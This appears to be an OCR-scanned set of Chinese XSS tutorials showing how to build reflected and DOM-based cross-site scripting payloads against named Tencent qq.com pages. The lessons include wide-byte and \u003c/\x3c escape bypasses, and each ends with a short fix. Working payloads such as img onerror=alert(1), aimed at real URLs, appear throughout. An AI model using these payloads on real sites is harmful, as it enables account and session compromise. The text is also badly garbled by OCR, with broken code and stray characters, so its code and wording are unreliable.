<input 二 ybe= hidden” name=" type” walue=" data /> 
<input tvype= hidder name=" site” walue=" diegi” /> 
“input type="hidden” name=" libid” walue="2” /> 
<input twvpe=" hidder name=" curpaee” walue=" | /> 
<input tvpe= hidden” name=" filterattr” walue=" 138,13 
<input type=" hdder name=" filtervalue” walue=" 350 











i 
















| wep WED, HSDPA, I 





3 <input tvpe="hidden” name=" orderbyr” walue=" Eadaddddddd 
<input type=" hidden 

) <input type=" hidden” rrame= tplname” walue=" centerse 

| <input type=" hidden name=" cnt” walue=" 口子 > 
了 | /form> 





taTiE= pagenum” walue=" 30" i 
eh. shtml /A> 


FI <script» 
A 处 理 搜 索 相 天 的 误 理 

war DoearchResult = new searchhesult 
03eEarchResult. setCurPaee tl). 
下 人 DageIntol ). irmerHIN., = oS5earcliResult. zetPageInfot). 
$i pareInfo2 ). inmnerHTHL 


Il | 
[| 
[加 家 
iD 
ID 
中 
已 
贿 : 
2 
Ta 
i 
十 
-QI 
种 
Ta 
i 
= 
Hh 
[| 
-一 -. 


| /A document. getElenentByIdi tder_selLect ) value 二 ”和 4 委 有 4 和 4 科 有 4 有 4444” 


CCtou 
var searchOrder = "aaaaaaaaaaaa ; z ee Bf CT 


2. 一 共有 3 处 输出 ， 位 于 HTML 属性 里 的 那 一 处 ， 我 们 放弃 了， 因为 双 引 号 被 天 
挤 了 。 那 么 还 剩 下 2 处 。 都 是 位 于 <script>..</script> 里 ， 而 且 挨 在 了 一 
起 。 


3. 先 看 第 2 处 ， 是 不 是 似 鲁 相似 啊 ?” 对 的 ， 教 程 6 里 刚刚 过 到 过 。 那 就 是 输出 在 
[注释 】 的 情况 。 我 们 用 换行 符 试 试 ? 


“SCr1pt» 
A 处理 搜 索 相 去 的 保 章 
Var OSEarchResult = new SearchResult ("oSearchResult”, D0, 30): 
SeEarchResult. setCurPaeetl). 
下 人 DageIrtol innerHTIEL = oSearchResult. eetPacelInfot).: 
中 人 DageInto2 1. innerHTIEL = oSearchResult. eetPacelnfot). 


document. setElementByIdt order select 1 。WaLUBE = “aaaa 


alert tl A, 志 一 一 一 哈 暗 ,时 然 可 以 。。 
李 _ - 
alert tl :A : : 红叶 酚 盟 
日 旺 ， 水 时 枚 疏 嘻 必 下 隔 OT 
a Ee 所 
0 换行 可 以 用 ， 一 条 是 坏 消 息 。。 下 面 出 现 的 一 句 坏 了 我 们 的 好 
事 。。 肿 么 


5. 这 个 时 候 ， 我 们 需要 先 说 点 javascript 的 知识 。 javascript， 字 符 串 允许 下 面 多 行 
的 写法 。 


var a=" 我 是 一 个 字符 串 \ 我 还 是 一 个 字符 串 " ; 
alert(a); 


6. 基于 这 点 ， 我 们 可 以 把 缺陷 点 构造 成 下 面 的 样子 。 


//document .getElementById("order_ select ).vValue = "aaaa\ alert(1);, 
Var Searchorder = "aaaa\ alert(1);//"; 


| = 
那么 代码 构造 的 解析 如 下 : 





= "aAaaa" 


alert(l); /让 大 一 一 ed 了 的 语句 本 









war Sar ch re 


这 一 名 是 注释 
由 干 有 了 一 个 反射 续 ， 变 成 mm 衣 窜 答 电 ea 
7. 带 看 这 个 想法 ， 请 上 我 们 的 反 斜 线 。。 


一 一 . nn 下 
下 Pl | HP | my i | 
doojdUaalertul EE 





“nput twphe= Nidden Tame= Orderby walue= aaad.., 


alert ili /> me 
<input tvpe=" hidden name=" TagE walue=" 30” /> 
<input twvpe=" hidden name=" tplname”™ rie eonseracarch bp 
<input tvpe=" hidder name=" cnt” walue=" 0 /> 
人 <form i 


“SCr1ipt,» 
A 处 理 搜 索 相 到 的 保 章 
var oSEarchResult = new SearchResult( oSeatchResult ", D0, 30 
SearchResult,. setCurPaee tl).: 
下 人 DageIhntol ). innerHTIEL = SearahRestit， zetPazelInfot).: 
$i pazeInfo2). immerHTIN., = oSearchResult. eetPagzelnfot): 







A document. eetElementByIdt DO 
alert trl) :A . 


Er select” ,walue =“aaaahk 


Var searchirder = "aaa | 


alert tl) i/ : CCctORs 
a 


Tarrint 


8. 态 剧 的 是 ， 反 和 斜 线 彼 过 滤 成 了 2 个 \\ ， 这 下 不 好 办 了 。 


9. 还 记得 在 教程 4 里 ， 我 们 提 到 的 宽 字 节 用 法 么 ?说 到 了 %c0 可 以 吃 掉 %5c 。 
我 们 看 看 页 面 的 编码 。 


<meta http-equlLv=- Content -Type” content="text/html; charset=gb2312， 
剧 
gbxxx 系列 的 啊 ， 寡 喜 中 。 
10. 于 是 ， 我 们 的 %c9 也 加 入 战斗 了 。 








http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=d1( 
-| | 
看 看 源码 中 的 输出 。 \\、 被 我 们 变 成 了 乱码 +\ 





有 和 和 站 
| | | | | | 这 一 [加 目 大 本 | yd 四国 | oad Lm 


a bmn es - = = = es 到 i “Mes = | i 到 时 ee Te 





SCrF1Dt. 
6 总 处 理 搜索 相 天 的 束 直 
war D3eEarchResult = new SearchResult ("oo3earchResult", 
SearchResult. setCurPace (1): 
$i pazeInfol ). inmerHIW, = o3earchResult. zetP 
bi" paeelInfo2"). irmerHIN, = oSearchResult. 








Ei EE EE Eo 


A Hocument. eetElementByIdt" order 
alert (1) A”. 


ee a ee EE "aaaal 钢 | ee Pact Ou 
? - : .Com 
11. 此 时 ， 标 点 符号 们 正在 开会 ， 开 会 的 主题 是 :“ 大 家 好 ， 才 是 真 的 好 ” 


修复 
方案 


乡 加 
日 4 
参 j 面 教 和 
至 
| 5S 
5 6 


8. Dom Xss 入 门 [ 显 式 输出 ] 


来 源 : . Dom Xss 入 门 [ 显 式 输 出 ] 


简要 摘 述 

反射 型 XSS 部 分 ， 融 到 这 里 了 。 接着 我 们 进入 Dom Xss 的 部 分 。 Dom Xss 相 比 
反射 型 XSS， 脑 袋 需 要 多 思考 一 层 。 也 就 是 说 ， 我 们 关注 的 不 仅 是 【输出 】 了 什 
么 ， 还 要 了 解 这 个 页 面 里 ， 【javascript】 拿 这 个 【输出 】 干 了 什么 。 为 了 循序 渐 
进 ， 本 例 讲 到 的 是 ， 【输出 】 直接 在 源 代 码 可 见 的 情况 。 


详细 说 明 
1. 在 学 习 Dom Xss 之 前 ， 先 来 补习 点 html, js 的 基础 知识 。 


<div id="a">xxx</div> 
<script> document .getElementById("a").innerHTML="yyyyyy ; 
</script> 


解释 如 下 : 


document .getE lementById( a innerHT™I 


ee 











一 YYYYYY ; 





运行 上 面 的 代码 之 后 ， xxx 就 会 受 成 yyyyyy 
2. 进一步 ， 我 们 的 yyyyyy ， 还 可 以 是 HTML 代码 。 
<div 1id="a">xxx</div> 
<script> 


document .getElementById("a").innerHTML=" <img src=1> "， 
</script> 


效果 如 下 : 


diw 1d=" a rx diw» 


20Cr1Dt» 









document. eetElementByIdi a )}. i1rmerHTIL=" | 
SCLTILD+> 
' woahtm 





] 屁 ， 导 一 运行 上 面 代码 后 的 ， 实际 效果 。 。。 贡 必 国有 软 供 还 个 销 。。。 


3. 再 进一步 ， JS 的 字符 串 中 的 字符 可 以 写 为 unicode 编码 。 铬 如 : < 可 以 表示 
为 Xu003c ，> 可 以 表示 为 Xu003e 不 知道 怎么 转 义 的 ， 可 以 使 用 gainover 
的 工具 。 工具 地 址 : http://app.baidu.com/app/enter?appid=280383 


从 55 【tanser (xssmiitt 字 符 吕 转换 工具 ) | 。 测试 数据 。 | | 。 使 用 





Nu003cU003e 


也 融 是 ， 我 们 上 面 的 代码 ， 可 以 进一步 写 为 。 


<div id="a">xxx</div> 

<script> 

document .getElementById("a").innerHTML="\UQ03cimg src=1\u003e",， 
</script> 


4. 上 面 看 起 来 废话 好 多 ， 但 是 还 是 很 重要 的 ， 这 对 于 后 面 实例 的 讲解 很 重要 。 
5. 我 们 来 看 看 一 个 具体 的 实例 ， 地 址 如 下 : 


http://datalib.ent.qq.com/cgi-bin/search?11ibid=1&keyvalue=aaaaaaa&t 
和 前 面 反 射 型 的 一 样 ， 我 们 先 看 看 输出 。 





> | |.ent.qq:com/cgi-bin/search?libid=l&keyvalue=aaaaaaa&attr=133&stype=2'%7| num 三 
-II LT 工本 一 DI LIC LICLellL, Hi ， Te - | 
class=" reference D 2 diw div aagaadad 3 个 共 6 个 | |Ww| 半 | 
class=" Index cot"» 《dm id-" warp irre ee i 
class="t+itle” >istrone Id "titLeshow> 按 职业 1 检索 : aaaaaaa 
/astroney< div sacript»if (" aadaddad =="" ) document. eetElementByIdt titleshow 1.irmerHTNL = “ 按 地 区 检索 : 全 部 
明星 :if ("职业 1"==" 职业 1 Ydocument. getElementByvIdi"t+itleshow). irmerHTIL= “ 按 职 半 栓 案 : aaaaaaa" :it {" 职业 
1*==* 职 业 2* ydocument. eetElementBvyIdi"t+itleshow). irmerHTIL=" 按 职业 检索 : aaaaaaa” :if 职业 1*==* 职 业 
3"1Ydocument. eetElementByvId("titleshow ).irmerHTIL="“ 控 职业 检索 : en 
“dir class=" index cot list"> <d1> 


相关 代码 ， 我 也 贴 出 来 。 





<strong id="titleshow"> 按 职业 1 检索 : aaaaaaa </strong></div> 
<script> if("aaaaaaa"=="") 

document .getElementById("titleshow").innerHTML=" 按 地 区 检索 : 全 部 明星 "， 
document .getElementById("titleshow").innerHTML=" 按 职业 检索 : aaaaaaa", 
ijf(" 职 业 1"==" 职 业 2") document.getElementById("titleshow").innerHTN 
ijf(" 职 业 1"==" 职 业 3") document.getElementById("titleshow").innerHTN 
</script> 





共有 6 处 ， 有 一 处 图 上 没 显示 ,但 是 也 没 用 处 ， 这 里 不 列 出 来 了 ， 看 上 面 代 三 
上 们 各 夫 。 我 们 已 经 知 迁 ， < ，> ，" 都 仆 过 滤 了 ， 用 前 面 提 到 的 某 些 拉 巧 ， 
似乎 也 无 法 直接 XSS。 那 么 该 怎么 办 呢 ? 


7. 在 看 到 本 教程 的 1，2，3 部 分 后 ， 联 明 的 你 们 不 知道 会 不 会 想到 些 什么 呢 ?” 对 
的 ， 那 就 是 这 里 出 现 了 innerHTML="[ 输 出 ]" 的 情况 。 


我 们 可 以 看 到 ， 上 面 代 码 中 ， 实 际 上 只 有 一 句 是 运行 了 的 。 我 们 重点 看 
它 。 if(" 职 业 Te 下 ) 

document .getElementById("titleshow").innerHTML=" 按 职业 检索 : [输出 ] " ; 
了 


8. 这 里 [输出 ] 最 然 过 滤 了 < ，> ， 但 是 并 没有 过 滤 入 。 这 样 一 来 ， 大 家 应 该 
清楚 ， 为 什么 上 面 要 说 到 < 可 以 写 为 N\u003c 了 吧 。 融 是 为 了 应 付 这 种 情 
No 


9. 因此 ， 我 们 可 以 构造 呐 陷 点 的 代码 如 下 : 


if(" 职 业 下 三 二 山 | | ) 
document .getElementById("titleshow").innerHTML=" 按 职业 检索 : XUu003cimt 





经 过 运行 后 ， titleshow 里 的 HTML 融会 变 为 ”<img src=1 onerror=alert(1)> 
， 从 而 弹出 1。 对 应 的 ， 我 们 的 利用 代码 ， 可 以 瑟 为 如 下 ， 其 中 空格 ， 我 写 为 
了 \u0020 


http://datalib.ent.qq.com/cgi-bin/search?1ibid=1&keyvalue=\u003C1im( 





看 看 对 应 的 源 代码 ， 太 众 的 事情 出 现 了 ，\u003c 和 \u003e 竟然 皱 腾讯 过 
Ta O oO 





mrc=IuO020onerror=alert 
| J , TOT=al 人 er 






a UE C =133&&stype=2 
f= ZI alien= Center becolors WFIFIFY FSpan ClIass= DOder XIUXIar ly F<1IMmE 
shuipine. eif »*/aspanv /td tr table> <div lass= blankd” style=" heieht: 2pr: 
< iw < iw “dr Id rieht” class= index cot > xf 


“> 按 职 业 1 检 索 : 1t :ime"u0D0gDsrc=1%\u0D2Donerror=alert (1)&et: 
src=1"uD02D0onerror=alert (1)&et :==""“)document. eetElementBvyIdt titl 晴 how" ). inmnerHTIL=" 控 地 区 检索 : 全 部 有 明星” 
imnmerHTIL=" 按 职业 检索 : 及 lt .imgesu0020src=1h\0020Donerror=alert i :if ("职业 1"==" 职 柱 2")document. getEleme 
tlaet :if 职 灶 1"==" 职 村 3" Ydocument. getElementBwvIdt"+itleshow ).irnmerHTJL=" 按 职业 检索 : 名]t :ime"uDD20srec 
1 “dt2><xtablLe width= 650” border="0" 

tr» 


10. 别 灰心 ， 被 过 滤 的 原因 是 因为 @Jannock 大 牛 报告 过 这 个 漏洞 。 跨 站 脚本 -可 
以 让 战场 离 得 更 远 ( 浅 谈 腾讯 架构 缺陷 ) 


11. 其 实 我 们 还 应 该 注 意 到 上 面 图 片 中 ， 过 滤 的 实际 上 是 \u003c 和 \u003e ， 
但 是 并 没有 过 滤 \u0020 ， 这 说 明 ， 腾讯 只 是 针对 性 的 过 寺 滤 ， 并 没有 过 滤 反 冬 
线 。 


12. 其 实 呢 ， 在 JS 字符 串 里 ， < 不 光 可 以 写 为 \u003c ， 还 可 以 写 为 
\x3c ， > 同样 可 以 写 为 \x3e 。 我 们 试 试 腾讯 过 滤 了 这 个 没有 了 呢 ? 


http://datalib.ent.qq.com/cgi-bin/search?11ibid=1&keyvalue=\x3Cimg\\ 
于 = 
对 应 源码 ， 看 来 没 过 滤 啊 一 ~~ 





ey ne ee mt 下 下 光村 和 i 交 全 于， 证 Ts srtr1 wa SE 
加 | | 已 喇 j bE | | 一 一 和 醒 ， FF 1 | Ei 有 | I | | LI | he i Ll 


= i i 国 到 i i . a Ms i i i ms Bs hm 下 -一 一 二 i 用. 和 Sh 
是 时 





Enl= -CENter becolor= FFFAFAFY SpA Class= DoOder XUXILar “人 工本 


1f ></apanv< tdr</try table> <diw class= blankd” style= heieht:2p 
< lw lw <diw id=" rieht” class=" index cot > 
"Eh ASCimgsu0020src= 人 有 






Donerror=ale = a ameltE +leshow  ) ,irmnerHTIL=" 按 地 区 检索 : 至 部 明 : 


“ 控 有 职业 检索: Vi ‘02 0src- i set 3 :if ("有 职业 1"==" 职业 2" Ydocument. getEle 
if "职业 1"==" 职 导 3" Ydocument. eetElementById("titleshow” ). jirmerHTII=* 按 职业 检索 : SCimgsubDnDe2nDbas 
1» “dt><xtable width=" 50" boarder="0 

i 


哎呀 ， 这 次 总 算 弹 出 来 了 。 见 漏洞 证 明 
比如 


document .getELementById( yY ) .InnerHTML= XXXXXXXXXX ， 
document .write("xxxxxxxxxxxx" ); 


还 有 一 些 网 站 ， 使 用 了 第 三 方 的 JS 库 ， 和 譬如 jQuery 时 ， 会 有 


$("#y").html("xxxxxxx" )，; 


绰 
炽 
站 加 
出 
| 
IE 
中 
员 lH 
TT 
竺 
Ht 


14. 当然 最 后 ， 还 中 


aa,InnerHTML= XXXXXXXXXXXX”:， 


这 种 情况 下 。xxxxx 只 能 使 用 <img src=1 onerror=alert(1)> 这 种 方式 来 触发 
JSs 


而 不 能 以 <script>alert(1)</script> 来 触发 ， 因 为 这 种 压根 不 会 执 
行 <script>.,</script> 之 间 的 内 容 。 IE 下 ， 可 以 使 用 


<script defer>alert(1)</script>。 


修复 方案 


此 案例 凸显 出 开发 人 员 的 意识 不 足 问 题 。 指 哪 修 哪 ， 浮 于 表面 的 修复 没有 任何 意 
> 
万 法 1. 输出 时 ， 过 滤 入 


方法 2. innerHTML=encodeHTML([ 输 出 ]) 


9. Dom Xss 入 门 [ 隐 式 输出 ] 


来 源 : 9. Dom Xss 入 门 [ 隐 式 输出 ] 


简要 摘 述 


上 一 坑 开 始 说 DomXss 了 ， 我 们 说 的 是 显 式 输出 的 情况 ， 即 我 们 可 以 在 右键 查看 源 
代码 的 时 候 ， 看 到 我 们 所 输出 的 内 容 。 而 有 一 些 时 候 ， 输出 操作 我 们 是 看 不 见 的 。 
它们 通 曾 发 生 在 javascript 代码 中 。 革 如 : var x=location.href; 这 名 
Javascript 实际 上 进行 了 一 个 隐 减 的 输出 操作 ， 即 将 location.href 的 内 容 输 
出 到 了 x 变量 中 。 一 起 来 看 看 相 天 的 例子 吧 人 一 








详细 说 明 
前 注 : 1-4 是 普通 原理 ， 没 看 明白 的 话 ， 可 以 从 5 开始 ， 结 合 实际 例子 看 。 


各 
1. 本 来 是 有 另外 一 个 例子 的 ， 不 过 不 知道 是 腾讯 已 经 给 修复 了 ， 还 是 之 前 测试 的 时 
候 人 品 好 ， 偶 和 尔 他 上 了 ， 总 之 现在 用 不 上 了 。 


3. 在 说 实际 例子 前 ， 我 们 来 说 一 个 前 端 开 发 人 员 非 常 习惯 使 用 的 一 段 代 码 。 下 面 大 
致 写 下 伪 代 码 。 


function getParam( 参 数 名 ){ 
// 获 取 地 址 栏 参数 , 通常 是 a=1&b=2&c=3， 
var x=location.search;// 或 者 是 1ocation.hash 
// 此 时 x="?a=1&b=2&c=3"， 
// 根 据 [ 参 数 名 ] 取 出 参数 名 对 应 的 值 
// 例 如 参数 名 =a， 则 y=1 
// 例 如 参数 名 =b， 则 y=2 
// 至 于 这 里 怎么 实现 这 个 功能 ， 可 以 用 循环 ， 可 以 用 indexof， 可 以 用 正则 var y 
// 退 回 y return y; 
} 


| | | 有 
它 的 作用 呢 ? 融 是 从 地 址 栏 的 参 效 里 取出 内 容 。 冲 如 : 


http://www.some.com/2.html?name=shouzi&age=20 


我 们 在 2.html， 要 显示 name 对 应 的 值 。 对 应 的 代码 则 非常 可 能 下 面 这 样 写 : 


因 | 





<div id="nick"> 加 载 中 ,. ,</div> 

<script> 

var a=getParam("name"); // 获 取 地 址 栏 里 的 name 参数 ， 即 shouzi document 
</script> 


ge 


4. 上 面 是 普通 开发 人 员 为 了 实现 功能 而 宇 的 代码 ， 如 果 没 有 安全 考虑 ， 就 会 存在 问 
题 。 如 果 上 面 的 地 址 变 为 了 : 





http://www.some.com/2.html?name=<img src=1 onerror=alert(1)>&age=2( 





<jmg src=1 onerror=alert(1)> document.getElementById("nick").innert 
Eee 下 | 
即 变 成 了 





document .getElementById("nick").innerHTML="<img Src=1 onerror=aleri 
[IE 
这 样 融 变 成 了 教程 8 中 的 情景 ， 从 而 触发 XSS。 
5. 接 看 我 们 看 一 个 实际 的 例子 。 





http://qt.qq.com/video/play_video.htm?sid=aaaaaa 


和 原来 的 不 同 ， 我 们 在 源 代码 里 搜索 不 到 东西 的 哦 ~ 


上 Bek ? | | 一 BE 
VIEW-soOUrce:qt.q9q:com/video/play_video.htm?sid=aaaaaa Yn 




















dd99 


Larset=" utft-8" /> 


吓 视频 应 用 -AT 语音 <title> 和 显 式 办 出 趟 i 


:0:; paddine:0:}table{ border-collapse:collapse: border-spacine:0:}lemilfont-style:normal:}ol,ul{ list— 
ne:lfieldset, ime, abbr, acronym! border:0:}input, select{ wertical-alien:middle}lhl, h2,h3, hd,hs,hi{l font— 

名 :Tq:before, gaftter lcontent: :]} 

Idyr lowverflow:hidden:} 

:normal 12px 1l. em Microsoft YaHhei,talhoma; simsun, Tahoma aans—serif: color:#6D6c6c .heiaht: 100%:width: 100%:} 


那 可 能 这 里 有 人 会 有 一 个 疑问 了 。 那 我 们 怎么 知道 有 没有 漏洞 呢 ? 别 担心 ， 方 法 是 
有 的 。 


这 里 以 chrome 为 例 ， 按 F12， 打 开 调 试 工具 ， 见 下 


| 日 qe 9 com/video/play video.htm?sid a Ba | 


re rr TT PTFE 
200 300 400 S00 BAU 
Jembed B83px < i i Ed。 pe pp: 


= 











<html> 
bE <head>..</head> 
v <bodys 
vv<Uliv Class="video” id="dy video”sy 
Tv <object width="188%" heieght="188%" 1d="f" classid="clsid:d27cdbbe-aebd-11c+-96b8- 
dd44553548888" codebase="http'/ /tpdownloadmacromedia. comipub/shockwave/:cabs/+1lash 
swftlash. cab#version=8 ,9G 和 “> 
<hbaram name="movie”" value=" "aaaaaa 
param name="allowscripthccess™ ValUe="Never"™y 
Daram name="allowFullscreen™” Walue="true"> 
<*paranm name="Wmode™” value="trahnsparent™s 
<bparam Name="gquality” value="adtohieh"™s 
embed width="186%" heieght="168e name="+" srt="aadaaa QuUality="autohish" 
sWlliveconnect=" hy Wmode="tfransparent" allowssriptaccess="Never" 
allowtullscreen="true” type="apHlicationyx-shockwave-+lash"” plueinspaee="http':,// 
WwW .Macromedia.com/eo/eetftlashplayer"> 
Fobjects> 
/divy 
bb <scripty...</scripts 
et 下 人 5 





















法 和 
FI 十字 


E 从 看 上 面 的 [ (出 小 TE 日 生日 
om CCtoDxs 
和 查看 源 代码 没有 什么 不 同 ， 只 是 这 次 是 在 调试 工具 里 看 而 已 。 


6. 通过 上 面 的 方式 ， 确 定 【 可 能 】 有 漏洞 之 后 。 我 们 可 以 有 2 个 方式 来 进行 下 一 
步 





O 〇 


6.1 直接 根据 调试 工具 里 看 到 的 HTML 代码 情况 ， 来 构造 利用 代码 。 优点 : 省 时 
间 ， 缺 点 : 如 果 对 方 有 一 定 过 滤 ， 就 很 难 构造 


6.2 定位 到 与 这 个 缺陷 参数 sid 相关 的 JS 代码 ， 绸 来 构造 利用 代码 。 优 点 : 能 利用 
一 些 复 厅 的 情况 ， 缺点 : 耗 时 间 。 


7. 对 于 新 手 来 说 ， 先 看 6.1 的 情况 。 看 到 步骤 5 里 面 的 那个 图 。 我 们 可 以 构造 以 下 
代码 。 


<object width="100%" height="100%" id="f" classid="clsid:d27cdb6e-: 
<param name="movie" value="aaaaaa"></object><img src="1" onerror="t 


.. .其它 的 省 略 了 .. . 


</object> 


.| 
对 应 的 图 片 解 析 : 


=Dbject width= 100%” height= 100% ”1gd= 十 Classigd= <15s1: ete 1icf-96b8-444553540000" codebase= 
"http:/ /fpdownload. macromedia. com/pub,shockwave, cabs/f lash,'swf lash. cab#version=8,0,0,0" 
<param name="movie’" value="aaadaa ></object><img src="]" Onerror="alert()> 


. .其它 的 省 略 了 ... 





| 


进而 "试探 性 ”的 测试 一 下 利用 代码 ， 因 为 我 们 不 知道 对 方 会 不 会 过 滤 掉 “ 双 引 
号 "， “括号 "之 类 的 ， 只 能 试 试 了 。 


http://gqt.qq.com/video/play_video.htm?sid=aaaaa|(http://gqt.qq.comA\ 









< /oD Dject>*< 1 日 19020src CTP 






[sn0 Ei 


Hiyw. widen T7430 < FAN 


= -i :车 ET 
| 富丽 sansnts | | 画 | Resources 人 加) hetwork 和 人 1LILe dits | Console 


二 | Computed | Elbow inkh 


htmls | str Les 十 :3 
bb <head>..</head> | 已 ITement .style + 
T <body> 三 | 


v<div ciass=" Video" id="dv video"y 
be <object width="16806%" height="1860%" jd="1" classid="clsid:d27cdbGe- 


1 
| 村 








debd-11ct-98b8-d4445535488908" codebagee="http: 7 | Matehed ESS Rules 
fpdowinload.macromedia.com/pub/shockwave/cabs/tlash; body 1{ plav video. 
swftlash.cabi#version=8,8,8,8" > obiect> | font: pnormal 
< ME 二 中 ip it DNer ror=" "alerte1) ie in 12px71. Gem 
<param Name="allowscriptAiccess” value="Never"> MicrosoTft 
<param name="allowFullscreen” Value="true"> CCtoOws 
<Daran Name= Wmode” Value=" transparent"s a 
| 


根据 这 个 情况 ， 我 们 可 以 进一步 修改 代码 。<img> 标 签 里 不 使 用 双 引 号 。 


http://gqt.qq.com/video/play_video.htm?sid=aaaaa|(http://gqt.qq.comA\ 
这 次 OK 啦 。 





qt.qq:com/video/play video.htmysid=aaaaaa"> </0 objec t> <img9 620src 二 


堆 qt.qq.com 上 的 网 页 显示 : 





m 的 及 地 
可 以 看 到 ， 这 种 方式 ， 写 利用 代码 很 快 。 


8. 再 来 看 看 6.2 的 方法 。 既 然 我 们 知道 了 ，sid 这 个 参数 会 被 使 用 。 那么 我 们 的 目 
标 是 ，javascript 的 代码 里 哪里 使 用 了 sid 这 个 参数 呢 ? 


9. 我 们 首先 ，F12 打开 调试 工具 ， 点 【Resources】， 再 点 Frames, 然后 Ctrl+ F 
搜索 "sid" 或 者 'sid' 






4 汉 |Frofiles 





Hetwork Es SoU LES CY tina 


| RL em ente 

| |Frames 

下 | | plav video. htm) 
WI Et gq. com) 





Functian ControlVersiont + 
function GetSwfvert }{var f+ 
tunctiaon getUrlParatparaNe 
tunction insertFlashtelm, 


[i 


= 









FE Tmazes 


i Fy Bs Bi Be 
tT 





8 | var slid=getUrlPara 
WW ocripts Riftisid || sid=="") 
于 计 和 中 | lping tess 1ed. TS 32 document .eetElementBy1 
加 Felset{ 


| 导 Ser wer time. 15 

[= dt. g9. com | 

be Tmagzes 
和 Scripts 


var tlash ver=GetswtWe 

i+(lash ver == -1)7 
document, EetElemer 

Telse i+rftlash ver,spl 
document ,EetElLemer 


Ll 
| Ovi By 下 


J i i i i 
5 


下 led: 


”| | ,Com 
我 们 运气 很 好 ， 一 下 残 定位 到 了 一 个 sid。 
10. 可 以 看 到 是 getUrlPara("sid") ， 从 单词 ， 我 们 不 难 猿 出 ，getUrlPara 束 是 


前 面 我们 提 到 的 “ 获 夫 取 地 址 栏 参数 "的 函数 。 为 了 进一步 俏 定 ， 我 们 可 以 很 方便 的 在 
console 里 查看 getUriParam 本 加 数 是 哈 样 的 。 







LE 





EE 
| 
[| 


i 
| 




















| 
] 











全 必 站 七 由 六 二 尺 癌 呈 本 


function getUrlParatparallame ,sUrl){if (typeoflsUrl)=="undefined' J{sUrl =|document, location.hreft }var urlRegex = New aite fndexof >= ote 


yif(!para}){return "";}wvar v=para[6] ;from = V.indexOf{ "=" });,var paraVvalue = Vv.substr(ifrom+l, v.leneth});while(l paraValue.indexOf Pe »= 和 ){r 
paraValue .lindexdft "#" ) » @ }{from = paraValue .LindewOfFt "#" ):paravalue = paraValue .substri8, from );}return paraValue;} 


obiect%3EmCime rc=1% onerror=alert(l /%3E" 


"httpo: i /ot qq. tom/ video/plav videv:htm?sid= 和 ida 3ES 





可 以 看 到 ， 实 际 上 getUrlParam 是 对 < ，> 做 了 过 滤 ， 但 是 由 于 chrome 浏览 器 
自身 的 XSS 防御 机 制 ， 导 致 Location.href 获取 的 Location,href 是 已 经 
经 过 编码 的 。 i Pee, 如 下 图 


yy BetUrlPars 
function getUrlPara(paraName, sUrl {if (typeof(sUrl)=="undetined' }{sUrl = bivar urlRegex = new RegExp(paraNamib=[ 
sift lpara){return "";}var v=para[@] ;fron = Vv,indexOfl "=" ),var paraValue = v.substrifrom:l, v.length)whilel paraValue,.indexOra’e" 
paraVvalue .indexwOF{l "s" ) > @ }{from = paraValue .indexOfF( "#" ,paraValue = paraValue .substr(lg, from };}return paraValue;:} 





和 了 TP 
OEatl1ON :Nrert 


"Http /gt ,gg9. Com video/plav video,.htmsid=aaaaady 2 ELC /oriecth3E 欠 lime src=1t0nerror=alert(1 3E" 





11. 按 道理 ，location.href 里 的 < ，> ，" 已 经 变 成 了 %3c ，%3e ，%22 已 经 
被 过 滤 了 ， 不 会 有 XSS 了 ， 为 什么 还 可 以 呢 ?我 们 进一步 往 后 看 。 






































ea 
be Tmages 3 var sid=EetUrlPara 
Scripte alistid: || sid==*"3 
ee, ; : 了 3 document .eetElementByIdt "dy wideo”).innerHTML='*diyv lass="ErFrmse" styl 
| | Ring tess ied. js EN 33 Le1Tsel 
| | server, time, js 3 var flash ver=GetSwrVert), 
辐 dt. 99:. Cam 35 i+ttlash ver 三 三 -1 
Te 3 五 document,.eetElementById{ "dy video").innerHTML="<diy class="Errmse” 
. E37 Yelse it+(f1lash ver.splitrt", [eli 
VY Scripts 38 document .eetELlementByIdi "dy videa").innerHTML= "<diy class="errmse” 
a Le 由 :SS 浊 | 39 Telsel 
rs ES 二 和 4 如 s1d decodeURIComponentl( sid) ‘trimt)} .replacet /ey "EE, VWNNASl' 
.上 Yeab soL 4] it 1!1IS waTIO Sidrsid 
4 document .getELlementByIdi "dy video")linnerHTHML=' <div class= "errm 
"3 IndexedlB 下 ， Helsef 
' 怖 Lecal Storage “id4| 4 = us | 
id | | | LEanceti 


"aaaaad ,> pO simE sre ce nerra ee -hs OT 





看 来 ， 关键 就 是 这 里 ， 这 里 有 一 步 decodeURIComponent 的 操作 ， 会 将 %3c ， 
%3e ， 义 变 回 < ，> 


供 参 考 的 完整 的 缺陷 代码 。 
var sid=getUrlPara("sid"); 


if(!'sid || sid==""){ 
document .getElementById("dv_video").innerHTML="'<div class="erri 


}elset 
var flash _ ver=GetSwfVer( ); 
1f(flash ver == -1)t{ 


document .getElementById("dv_video").innerHTML='<div class=' 
Yelse if(flash ver.split('.")[0|]<10)t{ 
document .getElementById("dv_video").innerHTML='<div class=' 
Yelsetf 
sid=decodeURIComponent(sid).trim().replace(/([\'\"1)/g,'\\ 
if(!is valid sid(sid))t 
document .getElementById("dv_video").innerHTML="'<div clt 
Yelserf 
insertFlash("dv_video","f",sid,"100%","100%" ); 





12. 接 看 ， 会 调用 insertFlash("dv_video","f",sid,"100%", "100%"); 
insertFlash 里 ， 也 并 没有 对 sid 进行 任何 过 滤 。 


function insertFlash(elm, eleid, url, w, h) it 
1f (!document .getElementById(elm)) return; 


Wales 
str += '<object width="" +wWw+ ”helght= + h+ ”1d= + e- 
str += <param name= movle” Value= + Url + '" />'，; 


str += '<param name="allowScriptAccess" value="never" />'， 

str += '<param name="allowFullscreen" value="true" />'，; 

str += '<param name="wmode" value="transparent" />'，; 

str += '<param name="quality" value="autohigh" />'， 

str += '<embed width="'" +w+ height= + h+ '" Nname="'" + t 
str += "</object>'， 

document .getElementById(elm).innerHTML = str 


[| 
片 解析 : 





function insertFlash(elm, eleid, [FT, w, hy 1 ni E 
if (!document.getElementById(el mr eturn: 这 里 的 sr1 即 传 入 的 sid 挫 雪 
var tr se a 


str += <object width="" + Ww + '" height="" + h+ id="" + eleid + '" classid= 
Isid:d27cdb6e-aed-11cf 96b8-444553540000 Codebases 
http:/ /fpdownload. macr omedia, com/pub/shochkave, cabs/flash/swf lash. cab#version=8,0,0,0"»>"; 
str += "<param name= movie”value=” + Wl + /> ; 
str += "<param Name=" allowscriptAccess” Value="Nnever” />"; 
str += "<param name="allowFullscreen” Value= true” />": 
str += "<param name= wmode” value="transparent™” />"; 
str += " <param name= quality” value=" autohigh /Ss"; 
